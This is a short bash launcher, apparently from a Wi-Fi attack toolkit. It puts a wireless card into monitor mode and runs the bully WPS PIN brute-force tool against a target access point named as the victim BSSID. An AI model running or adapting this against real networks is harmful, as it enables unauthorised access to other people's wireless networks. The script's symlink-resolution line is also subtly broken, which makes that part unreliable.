#!/bin/bash

#source and call depends()
SOURCE="${BASH_SOURCE[0]}"
while [[ -h "$SOURCE" ]]; do # resolve $SOURCE until the file is no longer a symlink
    DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
    SOURCE="$(readlink "$SOURCE")"
    [[ $SOURCE != /* ]] && SOURCE="$SOURCE" # if $SOURCE was a relative symlink, we need to resolve it's relativeness to the path where the symlink file was located
done
DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
source ${DIR}/userspace
source airmon

#nm_chcek was here

bully()
{
    xterm -hold -bg black -fg blue -T "Bully" -geometry 90x20 -e bully -b $VICTIM_BSSID -c $CHAN -B $MON &>/dev/null &
    keepalive
}

trap killAll INT HUP;

killAll()
{
    airmon-ng stop $MON
    echo "${BLD_TEA}$(cat ${DIR_LOGO}die.logo)${TXT_RST}"
    sleep 2
    exit 0
}
depends #sourced from userspace
di_it #sourced from airmon
do_it_check #sourced from airmon
bully